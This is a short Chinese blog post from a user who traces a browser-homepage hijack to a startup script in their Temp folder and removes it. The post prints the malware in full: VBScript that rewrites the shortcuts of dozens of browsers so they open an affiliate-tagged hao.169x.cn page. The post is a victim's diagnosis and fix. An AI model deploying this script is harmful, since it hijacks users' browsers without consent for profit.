tn=92926678_s_hao_pg之类的跳转劫持解决方案
2016-02-26 21:56
309 查看
今天打开浏览器,突然发现浏览器地址栏出现了一串后缀
马丹,一看就是被劫持了,我只要一访问这个地址,劫持的人就会收到百度给的钱,,找了半天,发现是
C:\Users\用户名\AppData\Local\Temp下面的一个dat脚本开机启动了,篡改了浏览器的地址
打开脚本
具体写的什么,我也不大懂,但是看到上面的那几个链接地址,就知道大概是什么意思了!
删掉这个脚本,就解决了问题了
马丹,一看就是被劫持了,我只要一访问这个地址,劫持的人就会收到百度给的钱,,找了半天,发现是
C:\Users\用户名\AppData\Local\Temp下面的一个dat脚本开机启动了,篡改了浏览器的地址
打开脚本
On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ChenXin\Desktop,C:\Users\ChenXin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ChenXin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ChenXin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ChenXin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
具体写的什么,我也不大懂,但是看到上面的那几个链接地址,就知道大概是什么意思了!
删掉这个脚本,就解决了问题了
相关文章推荐
- 如何确定小端和大端
- Java集合类详解
- web.xml配置
- 出差(三)
- Spring 复习笔记01
- 对象的序列化
- OpenGL编程指南2D部分【下】
- 最简单的基于librtmp的示例:发布(FLV通过RTMP发布)
- 英语NLP词汇类别列表
- list类3
- hdu 3629 Convex 计算几何
- jquery.jscrollpane.js滚动速度设置
- C 标准库(一)
- windows系统安装ubuntu双系统
- scala中的上下文绑定(context bound)
- iOS 设计模式 - 观察者模式
- OpenGL编程指南2D部分【上】
- 委托进阶
- 毕业设计第十一天
- MVC和MVVM的区别,原作者唐巧,他发的每一篇文章都一针见血